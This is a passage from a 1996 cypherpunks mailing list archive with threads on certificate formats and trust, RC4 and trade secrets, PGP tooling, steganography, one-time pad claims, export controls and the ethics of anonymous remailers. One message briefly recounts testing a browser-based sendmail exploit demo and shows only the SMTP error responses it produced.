8Mpvxlr4HKEEFwZiIEFlCe4yFOEl4/TlyES8TexJZ15ss3lZ4uDKvVC/G5GiHUoD
nsvHEXgBso4=
=yu1D
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 29 Feb 1996 15:02:26 +0800
To: Alex Strasheim <cp@proust.suba.com>
Subject: Re: X.509 certs that don't guarantee identity
In-Reply-To: <199602260448.WAA01201@proust.suba.com>
Message-ID: <3135473B.332E@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Alex Strasheim wrote:
> 
> On the 23rd, Jeff Weinstein said this concerning the natural
> semi-anonymity of the net:
> 
> > Given that verisign and others will soon begin issuing large numbers of
> > certificates that do not guarantee the identity of the key holder, it seems
> > that this tradition will continue even with the wide deployment of X509
> > certs.
> 
> This has been bugging me since I read it.  I'm not sure I understand the
> plan;  it only makes sense to me if "anonymous" X.509 certs are issued
> for user authentication only, not for server authentication.  Is that
> what this is about?
> 
> (If anonymous certs are issued for servers, why should such a cert be
> treated any differently than one I generate on my own, which causes
> warning screens about an unknown CA to pop up?)

  The navigator will not be configured to automatically trust the verisign
level 1 and 2 certificates for SSL servers.  You will get the same warning
dialog with these certs as you do with one you generate on your own.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Thu, 29 Feb 1996 17:25:49 +0800
To: Mutant Rob <cypherpunks@toad.com
Subject: Re: Remember, RC4 is now PC1
Message-ID: <ad5a9793020210047f23@[132.162.233.188]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:31 AM 02/28/96, Mutant Rob wrote:
>It'd be funny if the next time somebody hacks a proprietary code, if they
>make some changes, redo the key schedule, perhaps in mind of
>strengthening the algorithm, and then post it to sci.crypt as "hey, I got
>this idea for a new crypto algorithm... what do you think?".  If the
>algorithm is different enough from the proprietary code version, with
>no clear connection between them, and the author can give full design
>rationale as if s/he wrote it from scratch, then what's a company to do?

Umm, if the _algorithm_ is different enough, it's a different algorithm and
it's not even an issue.   I guess you mean if the algorithm is the
substantially the same, but the code implementing it is substantially
different.

But I'm not sure that matters anyway.  The way I understand it with trade
secrets is:  If I'm an employee of PKP (let's pretend they have employees
who actually look at code), and they want to keep something a trade secret,
they make me sign a non-disclosure agreement.  If I break it, and they can
prove I broke it, I am in big trouble for breach of contract.   I guess if
I can make up a convincing enough lie about inventing it from scratch, I
can get off.  But if I work for PKP, I don't think I'm going to have too
much luck convincing a jury that I just coincidentally stumbled on the same
algorithm.

If I, who has signed a non-disclosure agreement with PKP, takes the trade
secret code and sends it to Mutant Rob, and Mutant Rob posts it near and
far, Mutant Rob hasn't done anything illegal, and hasn't broken any
contractual obligations, and is basically doing fine.  As I understand it.
So it doens't matter if he pretends he invented it himself or not.  Of
course, if they take him in the back room and introduce him to "Mr. Thingy"
(or make him testify in court, if you prefer), and they find out it was me
who sent it to him, I'm still in Big Trouble.

Trade secrets don't really have any legal standing or protection, for the
most part.  They're just things a company is trying to keep secret, for the
most part.  Generally by using non-disclosure agreements.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Thu, 29 Feb 1996 18:08:49 +0800
To: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Subject: Re: Remember, RC4 is now PC1
Message-ID: <199602290529.AAA27308@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


> Umm, if the _algorithm_ is different enough, it's a different algorithm and
> it's not even an issue.   I guess you mean if the algorithm is the
> substantially the same, but the code implementing it is substantially
> different.

Well, maybe something like using the same core algorithm but a very 
different (and better?) key expansion algorithm, for instance.
 
> But I'm not sure that matters anyway.  The way I understand it with trade
> secrets is:  If I'm an employee of PKP (let's pretend they have employees
> who actually look at code), and they want to keep something a trade secret,
> they make me sign a non-disclosure agreement.  If I break it, and they can
[..]

But what if someone reverse engineered an algorithm, worked on 
it a few months, and then published something on the net, with a 
different key set up routine, and a very similar core algorithm 
(different for one or two operations, but an improvement) and 
discussed it in terms of having constructed the algorithm himself.

It has nothing to do with anyone signing non-disclosure agreements, 
since if the cipher is widely used in popular software, sooner or 
later someone will reverse engineer it.

> Trade secrets don't really have any legal standing or protection, for the
> most part.  They're just things a company is trying to keep secret, for the
> most part.  Generally by using non-disclosure agreements.

And my point is that what if somebody publishes something and offers 
it in the public domain that is strikingly similar but not the same, 
with no clear way to tell if it was invented separately or reverse 
engineered and fudged?

I can imagine a hacker doing that to another trade secret cipher... I 
can also imagine someone reinventing the same cipher if it's simple 
enough.

That's another problem with trade secrets.

 
Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Thu, 29 Feb 1996 18:58:02 +0800
To: cypherpunks@toad.com
Subject: Site certificates?
Message-ID: <2.2.32.19960228182806.006842f8@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Can someone point me in the direction of who I need to talk to in order to get security certificates for a Web server I'm setting up? I sent email to MS and Netscape, and neither has deigned to respond in 4 days....

Thanks

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMTSCEcVrTvyYOzAZAQG2hwP+L0tquQzMQC8XC9azPJsuFGbFq0ijTftI
sGQIA9ddphwL+bWdD0utDfMBrRxPFqM1kTZNZKzGTU4VUokoBUh/wPiqkim8+v61
cQFAIK8Xl3IbqnZfjMjW3rfmSYKaPXEVRHd0ssOFV535s3K3rSZN9ck0qxioyjK/
aEgCxcXRsXg=
=kCqo
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
For privacy tools: http://www.geocities.com/capitolhill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 2 Mar 1996 18:12:44 +0800
To: Mike Ingle <inglem@adnetsol.com>
Subject: Re: PGP to PC mail integration
Message-ID: <199602290844.AAA03839@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:18 AM 2/28/96 -0800, Mike Ingle <inglem@adnetsol.com>
suggested setting up a VB program on localhost to proxy POP and SMTP requests
for PGP, rather than hitting it from the user interface.
>Once this is set up, the user burden is near zero, and it works with
>any winsock-based mail program. What do you think of the idea?

It'd probably be pretty convenient for incoming, though you need to build
some mechanism for displaying the PGP output for signatures (since PGP
gives you the contents of the signed material when you check the sig.).
One interesting security problem is how to distinguish between the message
your PGP bot drops in your mailbox containing the message and an indication that
the signature is good from a message that someone carefully constructed
that _looks_ identical but includes its _own_ indication that the
(possibly bad) signature is good.

For outgoing mail, you'd either have to sign everything, which may be good,
or have a way to tell it the proxy whether or not to sign the mail,
and you'd either need to hand it your passphrase each time or take the 
security risk of leaving an autosigner hanging around listening on a port,
just _waiting_ for somebody to lie about where they're connecting from
and get your bot to sign arbitrary things.....  There are also minor issues
if you use multiple keys, which most people probably should.

Interfaces between VB and PGP262 are a bit crude - Private Idaho is a good
example.
The problem is that PGP262 is a DOS program, so you need to POP up a DOS window
to run it in, and then make the window go away.  PI does that just fine,
but it's a bit ugly to watch; it's much cleaner with ViaCrypt's
Windows-based PGP.
PGP 3.0 will simplify this, since you'll be able to use PGP as a library
instead of a hauling up DOS to run it in.

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 1 Mar 1996 06:00:56 +0800
To: Bruce Zambini <jlasser@rwd.goucher.edu>
Subject: Re: Simpler solutions (was Re: Stealth PGP work)
Message-ID: <199602290844.AAA03851@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:26 AM 2/28/96 -0500, Bruce Zambini wrote:
>Or, you can develop a public-key stego system...
>ie a stego system that uses bits in specific ways depending on the 
>private key of the recipient.
I assume you mean the public key of the recipient?

>Something I've been thinking about, but haven't quite figured out how to 
>do yet, except that one could use certain bits based on a PRNG and begin 
>the message with an RSA-encrypted seed (ie the first X bits will be the 
>seed, encrypted with your public PGP key).

That's equivalent to 
   stego(picture, ( RSA(sessionkey,pubkey), Symmetric(message, sessionkey)))
where Symmetric is a potentially cheaper (and weaker) algorithm than IDEA
that possibly uses transposition rather than strict block-structuring.
This approach is no more obscure than stego(stealth(PGP(message, pubkey)))
though slightly more obscure than stego(PGP(message, pubkey)), optionally
less secure,
and probably not much faster except for long messages with wimpy Symmetric.
And it still suffers from the non-stealthiness of vanilla RSA that 
Hal Finney, Adam Back, Harry Hastur, and others have discussed.
Might as well keep the stego and encryption parts separate.

You gain a certain degree of obscurity by using
   stego(picture, scramble( PGP(message, pubkey), key ))
where scramble is some cheap symmetric encryption algorithm and 
key is either the recipient's public key or keyid, and PGP is in binary mode.
This hides the message from eavesdroppers who don't know the recipient,
but not from eavesdroppers who are willing to test against the keys
of a list of usual suspects (assuming the recipient is one of them.)

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 1 Mar 1996 06:00:45 +0800
To: Dimitris Tsapakidis <dimitrt@dcs.rhbnc.ac.uk>
Subject: Re: Diffie-Hellman for Matchmaking?
Message-ID: <199602290844.AAA03859@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:37 PM 2/27/96 +0000, Dimitris Tsapakidis <dimitrt@dcs.rhbnc.ac.uk> wrote:
>This is a followup to my "Dating Problem" question  [.....]

What's the reason for ZKP below?  Is the objective that A and B
only know the other one is interested if they have also
advertised interest, and that nobody else can tell they're 
interested in each other?  Or just that you can advertise who
you're interested in so that only they know you're interested
and nobody else does (except possibly a Trusted Third Party.)

For the latter case, instead of publishing g^(AB)mod n,
publish hash(g^(AB)mod n), where hash is some non-invertible
function (maybe strong like MD5, or maybe cheap like a CRC32,
depending on how often you're willing to risk collisions.)
If you're concerned about replay attacks, use something like
(timestamp, MD5(timestamp, g^(AB)mod n)).

>Person A is interested to match person B, so he computes
>g^(AB)mod n. B is interested in X, where X may or may not
>be A, and calculates g^(BX)mod n. Now, they compare these
>two "common keys" either using some Zero Knowledge scheme
>that ensures fairness (at no point one party has significantly
>more information than the other) or through a Trusted Third Party.
>If they are the same, then this means X=A, so A and B
>have a match (e.g. a date). The common keys must remain
>secret (hence the ZK above): if g^(BX)mod n "escaped"
>to the public, then the real X would find out that
>B is interested in him.

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 1 Mar 1996 06:07:00 +0800
To: cypherpunks@toad.com
Subject: Re: Percy the Python loves IPG
Message-ID: <199602290844.AAA03863@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:41 PM 2/25/96 -0500, ab411@detroit.freenet.org (David R. Conrad) wrote:
>I think the IPG system is great!  Percy, my pet python, has never been
>slicker or better lubricated!
:-)

>IPG Sales <ipgsales@cyberstation.net> wrote:
>>Perhaps so, but our system does employ a true hardware generated OTP, and
>>operates similiar to what you describe -  however, the important
>>differernce is that we use a small OTP to generate a larger OTP, like
>>stringing the cable across the Golden Gate narrows.

That's not a cryptographic one-time-pad - the folks who strung the cable
across the Golden Gate used the little cable to haul a bigger hardware cable
across - you're taking your little cable and stretching it into a longer
thinner cable, tangling it up a bit, and hauling the ends across the narrows.
You haven't added anything to it, so it hasn't gotten any stronger,
and it may have gotten a lot weaker.

If the Small Pad has S bits of entropy, and the Large Pad has L>S bits,
the Large Pad still has s<=S bits of entropy in it, because you haven't
added any more from your hardware RNG - you've just shuffled around
the S bits of entropy you had and maybe even lost some if you're careless.
Therefore, the Large Pad is not a One Time Pad, because it's using each bit
of the Small Pad more than Once.  Maybe you only use the Large Pad once,
but it's no longer a One Time Pad; it's a small pad used more than once.
By your own admission, you're using your pads more than once.

A true One Time Pad has the property that each bit of pad has one bit of
entropy,
so even if I know the value of N-1 bits of the pad, I know entirely nothing
about the value of the other bit, even with infinite computation.
With your method, if I know N-1 bits of the large pad, and have a large
enough computer, I can determine the other bit.  Depending on how strong
your algorithm for deriving the Large Pad from the Small Pad is,
I may or may not be able to afford the computation, and the computer
may or may not fit on one planet, but the bit is recoverable;
finding a fast way to crack it is just gravy.

Furthermore, there are two ways I can tell that you've only given the
Large Pad to the two official recipients and destroyed your originals.
One way is to totally observe your handling procedures all the time,
so I know what you've done with it.  This is obviously impractical.

The other way, a bit less secure, is for you to sign a contract as part of
your service that says what how you will generate and handle the keys,
who you'll give them to, what bonding and insurance you have, and how much
liability you'll accept for mishandling.  This isn't mathematically secure,
like a real one time pad, but it does establish a certain trust level -
I now know how much care you're using with the pads, how much I can sue you for
if you mess up, and therefore I can estimate the value of the information
I can trust your product to carry.  In general, that means I can trust it for
conversations which have a specific, limited monetary value, such as
purchase orders
for parts - I can sue you for the $N I'd lose if the message gets stolen.
But I'd better not trust it for high-value secrets, like my marketing strategy
or trade secrets or plans to invade Cuba, because if you mess up,
I can't recover enough money from you to cover my loss if they leak.

So please email me the keys to your company; I'll donate 10% of the value
to David's python Percy for extra snake oil.





#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 1 Mar 1996 05:58:03 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: S/MIME outside the US?
Message-ID: <199602290845.AAA03948@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:49 PM 2/24/96 -0500, Lewis  wrote:
>volley@lls.se writes:
>> If I got things right, DES is "exportable" as long as the keysize
>> is kept under a certain size, which is too small to be really secure?
>
>All things are exportable as long as the keysize is kept under a certain size,
>which is too small to be really secure.  

That's not correct - you can only export crypto code from the US
for which you have Permission, and they'll only give you Permission
if it's weak crypto or you agree to be Well-Behaved (e.g. US banks 
can export real DES for talking to other banks, but US banks can be
subpoenaed and forced to hand over the plaintext.)

There have been people who've gotten export permission for modified DES,
e.g. real 56-bit DES with the key chosen from a 40-bit keyspace.

I'm assuming from volley's address that he or she is in Sweden,
and thus not directly limited by US export laws.  Write what you want,
and post it somewhere outside the US; we can import it legally.
As a non-American, you probably couldn't get US export permission for
even 40-bit RC4, and maybe not even for rot13.

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 1 Mar 1996 05:50:42 +0800
To: daw@cs.berkeley.edu
Subject: Re: fun with the web and security
Message-ID: <199602290845.AAA03957@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:38 PM 2/27/96 -0800, you wrote:
>Here's a fun way to exploit security holes via the web:
>	http://www.cs.berkeley.edu/~daw/js1.html
>A rough representation of its contents follow.

Well, that was amusing.  (It gophered to localhost:25 and sent
some mail and attempted to exploit a traditional sendmail bug.)
I was wondering what would happen, since I'm behind a firewall
and don't _have_ an SMTP listener on port 25, nor does my PC really
do localhost in any useful manner.  What happened, of course,
was that Netscape used my proxy settings for gopher,
sent the request to the firewall, and tried to connect to localhost:25 there;
it answered, accepted some mail for delivery, then
503 Need MAIL before RCPT
503 Need MAIL command
500 Command unrecognized
                ... many of these
500 Command unrecognized
501 Syntax error in parameters scanning "root@localhost"
500 Command unrecognized
500 Command unrecognized
500 Command unrecognized
221 [MY PROXY MACHINE'S NAME]. closing connection


Good stuff.  (And I assume the proxy server had the debug hole blocked...)




#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cme@cybercash.com (Carl Ellison)
Date: Thu, 29 Feb 1996 16:42:18 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: Spin Control Alert (LI Newsday, 2/12/96)
Message-ID: <v02140b14ad5b1393aa83@[204.254.34.231]>
MIME-Version: 1.0
Content-Type: text/plain


At 16:52 2/17/96, Declan B. McCullagh wrote:

>McMickle, a protege of Taylor's, *wrote* Sen. Chuck Grassley's
>net.indecency legislation. McMickle is a longtime anti-porn activist and
>worked in an office shared by the National Law Center, the National
>Coalition Against Pornography, and Enough is Enough! McMickle now works
>for Grassley.

McMickle also drafted the Grassley bill which would turn ftp of PGP into
a RICO-enforceable federal crime.  That's the bill the FBI declared was
laughably extreme.  It sank into nothingness -- but I did have a few
rounds with McMickle on the phone about it.  He appeared to take special
pleasure in the idea of putting PRZ in jail and siezing all his worldly
goods for the crime of nose-thumbing at the USGov't.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison          cme@cybercash.com   http://www.clark.net/pub/cme |
|CyberCash, Inc., Suite 430                   http://www.cybercash.com/    |
|2100 Reston Parkway           PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2 |
|Reston, VA 22091      Tel: (703) 620-4200                                 |
+--------------------------------------------------------------------------+






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cme@cybercash.com (Carl Ellison)
Date: Fri, 1 Mar 1996 06:09:58 +0800
To: Laurence Lundblade <lgl@qualcomm.com>
Subject: Re: A brief comparison of email encryption protocols
Message-ID: <v02140b15ad5b14e9fad1@[204.254.34.231]>
MIME-Version: 1.0
Content-Type: text/plain


We're working on some of these issues, as we speak, over in the SPKI mailing
list.  Some of my contributions are available on

        http://www.clark.net/pub/cme/html/cert.html

At 20:02 2/16/96, Laurence Lundblade wrote:

>The Trust Model
>---------------
>Any fully implemented system will have to choose some form of a trust
>model.  Some possibilities are:
>  * web of trust
>  * strict hierarchy
>  * web of hierarchies or some other hybrid

The one some of us advocate is a web of certificates, each one of which
assigns a specific attribute or permission to a public key.
These certificates are not tied to human identities, but a human identity
can be attached as yet another attribute of a public key via a certificate
for that purpose.

For many attributes to be attached to a public key [e.g., permission to
spend money, permission to speak for an organization, ...] there is no
need for a human identity beyond the implicit one of "the person who
knows how to exercise the indicated private key" which comes with any
public key.



>The Certificate format
>----------------------
>It seems possible to pick a certificate format independent of the other
>issues.  Doing so would allow us to leverage components like we do with
>other data objects like MIME.  There probably only two major contenders:
>  * X.509 v3
>     + broadly supported by standard bodies
>     + supported by several industries (e.g., banking)
>     + very rich and flexible
>     + ASN.1
>     - ASN.1 (tough for a student to get an ASN.1 compiler)
>     - complicated
>  * PGP keys
>     + widely deployed
>     + simple to write code for
>     - difficult to lookup (linear search on key id required)
>     - too simple to support many trust models and distribution systems

We're proposing a third certificate format.  X.509 is an identity
certificate, unless one bends it severely.  Signed PGP keys are also
a kind of identity certificate.  Our proposal is an attribute certificate,
not an identity certificate.  It is simple to lookup these certs.
Like X.509, my certs have an Issuing-name and a Subject-name -- but
they're both cryptographic hashes of public keys.  You can take a portion
of those hashes [e.g., low order 12 bits] and use it to index a hash table
of certificates or keys.  The cert is more general than X.509 -- that is,
it includes all of X.509 and then some [because we don't require some
binding to a human identity, don't require a Certificate Authority, ...].
Our first format is RFC822-like -- so it's easy to parse and generate and
read and use.  It's very rich and flexible.  We're working to make it
an IETF standard.  It does not use ASN.1 and has none of the baroqueness
of X.509.

In fact, these certs can be formed as PGP clear-signed messages.

>
>Note that both use the RSA algorithms, so they are interchangeable at some
>very basic level.

We're using RSA or whatever else you want [e.g., DSA].  In fact, in our
cert format, you can use DSA to sign an RSA key, a PGP key to sign a
Fortezza key, etc.



 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison          cme@cybercash.com   http://www.clark.net/pub/cme |
|CyberCash, Inc., Suite 430                   http://www.cybercash.com/    |
|2100 Reston Parkway           PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2 |
|Reston, VA 22091      Tel: (703) 620-4200                                 |
+--------------------------------------------------------------------------+






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William Marlow" <William_Marlow@cpqm.saic.com>
Date: Thu, 29 Feb 1996 20:37:11 +0800
To: RON_KNECHT@cpqm.saic.com>
Subject: Re: Strassmann's  Anonymous
Message-ID: <n1386554759.88688@cpqm.saic.com>
MIME-Version: 1.0
Content-Type: text/plain


To all,

I feel compelled to add some comments to this lively discussion:

The point was that we all need to be aware of the use of remailers as possible
parts of evil schemes.  The  recent revelations by some that cyberspace
reflects real life is the case here.  Remailers provide a means for the "dark
side" to communicate, but they also provide the means for "the good side" as
well.  Mr. Byfield's assertions are most likely correct that remailers are
used most of the time for "non-evil" purposes. 

Awareness of a problem is the first step in everyone addressing the best ways
that we as a society (both Cyber and otherwise) deal with it.

I have been targeted by those who wish to do harm using remailers.  It is not
a fun thing to deal with, but it is a fact of Cyberspace.

 I personally like remailers,  ones which have no governments, good guys, bad
guys or anyone else monitoring them, but we as a society must deal with all of
these elements.

Bill Marlow
------------------------------
Date: 2/28/96 5:02 PM
To: Marlow, William
From: t byfield

A few observations on Paul Strassman's response to John R. Levine; I've
rearranged it a bit for clarity, edited out a handful of lines, and
whittled down the CCs.

At 4:01 PM 2/28/96, Paul A. Strassmann wrote:

John R. Levine:
> >It's been possible for at least a century to mail letters with no
> >return address.  It's equally possible to use post office boxes and
> >mail drops, or even a chain of mail drops, to have two-way exchanges
> >of messages between people who don't know each other's identities.
> >
> >As far as I can tell, the existence of anonymous postal mail hasn't
> >caused any great trouble over the past century.  Can you explain why
> >the appearance of similar facilities for on-line mail presents a
> >greater problem?

Paul Strassmann:
>Since the idea that Internet remailers are not much different than
>anonymous letters sent by mail is an often repeated theme, it warrants a
>comment:
>
>1. Your statement that anonymous post mail hasn't caused any "great
>trouble" over the past century does not stand up well. I have not done a
>statistical sampling of incidents, but I wish to note that all my exposures
>(personal and otherwise) to anonymous post have been associated with
>extortion, spreading of unwarranted rumors and unsubstantiated accusations.
>Most ransom notes in kidnapping cases have been conveyed by this means.

        Obviously, kidnapping and extortion demands sent anonymously
through the post would attract far more attention than innocuous uses
would--as did the recent incident in which someone donated (by anonymous
mail) a million-dollar McDonald's sweepstakes ticket to a children's
hospital. I daresay that for every such criminal instance you could cite,
there are hundreds or even thousands of instances of completely benign
"secret santas" and anonymous valentines from teenage "secret admirers,"
for example--which would hardly bear out your claim that

>In civilized  society the receipt of anonymous post has been always
>associated with unacceptable social behavior. That reputation persists.

        Valentines and gifts sent anonymously will no doubt strike some
people as trivial in the face of "information warfare" and other such
gothic notions, and perhaps they are; but I can only wonder what exactly
these valiant strategists think they're protecting and from whom they're
protecting it.



>2. Your assertion that one can be equally anonymous by post as with e-mail
>does not stand up.
>
>First, anonymous mail is likely to carry stamp cancellation marks, which
>provides an important clue as to the origin of the message.
>
>Second, criminal  forensic techniques have been used very successfully in
>tracing identifying marks, such as typewriter characteristics, Xerox copy
>drum defects and other tricks such as genetic identifications of saliva
>remnants left from licking a stamp or sealing the envelope. There are many
>others. Anonymous e-mail does not convey such clues.
>
>Third, anonymous mail operates on a totally different scale and with a
>different technology than post. The fact that automobiles were originally
>called "horseless carriages" does not make them possess the attributes of
>horse-carriages. When technology scales up from thousands to hundred
>millions, the potential consequences are not subject to simple
>extrapolation.

        By the same token, the fact that law enforcement agencies have,
over the last two centuries, developed the forms of forensic analysis you
mention doesn't mean that these techniques are a god-given right whose
shortcomings in the face of new technologies need to be compensated for.
These techniques are, as you point out, contingent on the traits peculiar
to the objects being examined. Postal mail consists of integral physical
objects which can bear these kinds of traces; email does not. Nor does
shouting--yet I've never heard anyone suggest that fans at a football game
should preface what they yell with their name and their address, or that
their failure to do so constitutes a threat to national security.



>3. Anonymous remailers have been conduits for misconduct ranging from
>"spamming" - e.g. launching thousands of messages to saturate server
>capacity - to massive distribution of "sniffers" that make a number of
>software-based fire-walls inoperative.

        This objection remailers is a red herring: giveaway ten-hour
accounts on AOL and other services, hacked accounts, accounts obtained
under false names, and accounts obtained under a True Name are much more
notorious sources of spam than are remailers. If spam is your objection,
you're barking up the wrong tree.
        As for the "massive deployment of 'sniffers'," anyone capable of
doing this or of using information gained by this means hardly needs
remailers.



>4. The most likely scenarios of an information assault on the information
>infrastructure that performs essential social functions such as message
>switching, transportation dispatching, public security communications, etc.
>always commences with a  saturation dispatch of a wide variety of
>intelligent agent via anonymous remailers.

        "Most likely scenarios" are speculative: something that hasn't
happened yet doesn't "always commence with" anything.



>There is a long list of anti-social and criminal behavior that is greatly
>facilitated by a guarantee of untraceability. The repertoire of such
>malfeasances is sufficiently long that it does not warrant further
elaboration.

        This chicken-or-egg formulation suggests that a milieu in which
total traceability is possible would greatly diminish criminal behaviors
and activity. Perhaps, but as you yourself have pointed out, such a milieu
is utterly antithetical to anything remotely resembling a free democracy.
Since the alternative to untraceability isn't viable, there's no point in
bringing it up.



>Now, I would like to repeat that I believe that anonymous remailers are
>here to stay - at least in democratic societies. However, that does not
>mean that one should continue insisting that anonymous remailes are not a
>different phenomenon than an envelope containing a message that does not
>have a return address.

        If you were the final arbiter on the question, your repeated claim
that "remailers are here to stay" would be much more comforting.
Unfortunately, the force of almost all your arguments is, in a nutshell,
that remailers are associated with and facilitate criminal and/or terrorist
activities--and that suggests to me that if you had your druthers, they
would be illegalized.
        I'm curious: Do you or do you not support the continued existence
of nonregulated, nonlicensed, and publicly accessible remailers? (Please
note that this is a different question than "Are remailers here to stay?")


regards
Ted Byfield



------------------ RFC822 Header Follows ------------------
Received: by cpqm.saic.com with SMTP;28 Feb 1996 17:00:13 +0100
Received: from panix.com by cpmx.saic.com; Wed, 28 Feb 96 16:55:25 -0800
Received: (from tbyfield@localhost) by panix.com (8.7/8.7/PanixU1.3) id
TAA08093; Wed, 28 Feb 1996 19:55:05 -0500 (EST)
Message-Id: <v02120d0aad5a771d4753@DialupEudora>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
X-PGP-KF: 75 7C E9 84 00 E1 1B 7A  AA 23 AE 59 BD 19 4B BE
X-XXX: If you're under 18, DO NOT READ THIS MESSAGE
X-Subliminal-Message: 
Date: Wed, 28 Feb 1996 20:01:52 -0500
To: paul@strassmann.com
From: tbyfield@panix.com (t byfield)
Subject: Re: Strassmann's  Anonymous Remailers Paper
Cc: William_Marlow@cpqm.saic.com,
    raph@CS.Berkeley.EDU,
    denning@cs.cosc.georgetown.edu,
    KAHIN@HULAW1.HARVARD.EDU,
    steve@method.com (Steve Strassmann),
    dolanvp@consultancy.com,
    RON_KNECHT@cpqm.saic.com,
    ALGERJ@NDU.EDU,
    GIESSLERF@NDU.EDU,
    cypherpunks@toad.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@tc.umn.edu>
Date: Thu, 29 Feb 1996 22:24:57 +0800
To: merriman@arn.net (David K. Merriman)
Subject: Re: Site certificates?
In-Reply-To: <2.2.32.19960228182806.006842f8@arn.net>
Message-ID: <3135b1416a2d002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurence Lundblade <lgl@qualcomm.com>
Date: Fri, 1 Mar 1996 06:41:31 +0800
To: cme@cybercash.com (Carl Ellison)
Subject: Re: A brief comparison of email encryption protocols
In-Reply-To: <v02140b15ad5b14e9fad1@[204.254.34.231]>
Message-ID: <v03005202ad5b8b0930e7@[129.46.110.231]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:43 AM 2/29/96, Carl Ellison wrote:

>>The Certificate format
>>----------------------
>>It seems possible to pick a certificate format independent of the other
>>issues.  Doing so would allow us to leverage components like we do with
>>other data objects like MIME.  There probably only two major contenders:
>>  * X.509 v3
>>     + broadly supported by standard bodies
>>     + supported by several industries (e.g., banking)
>>     + very rich and flexible
>>     + ASN.1
>>     - ASN.1 (tough for a student to get an ASN.1 compiler)
>>     - complicated
>>  * PGP keys
>>     + widely deployed
>>     + simple to write code for
>>     - difficult to lookup (linear search on key id required)
>>     - too simple to support many trust models and distribution systems
>
>We're proposing a third certificate format.  X.509 is an identity
>certificate, unless one bends it severely.  Signed PGP keys are also
>a kind of identity certificate.  Our proposal is an attribute certificate,
>not an identity certificate.  It is simple to lookup these certs.
>Like X.509, my certs have an Issuing-name and a Subject-name -- but
>they're both cryptographic hashes of public keys.  You can take a portion
>of those hashes [e.g., low order 12 bits] and use it to index a hash table
